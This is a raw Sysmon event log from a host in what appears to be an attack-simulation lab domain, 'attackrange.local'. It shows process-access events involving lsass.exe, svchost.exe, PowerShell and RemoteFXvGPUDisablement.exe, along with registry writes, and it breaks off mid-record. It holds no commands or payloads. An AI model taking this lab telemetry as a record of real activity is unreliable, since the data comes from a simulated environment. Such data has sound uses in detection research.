13:34:01.111{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.111{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.049{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_jy0wdfx4.0qq.ps12021-01-18 13:34:01.049 11241100x80000000000000001070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.049{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_1pz02ssh.3es.ps12021-01-18 13:34:01.033 10341000x80000000000000001069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:00.986{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:00.986{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:00.627{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:00.627{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:00.627{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 10341000x80000000000000001064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.486{00000000-0000-0000-0000-000000000000}24442520C:\Windows\system32\conhost.exe{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.486{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2444C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.424{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.424{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.330{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005d9) 10341000x80000000000000001059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.299{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 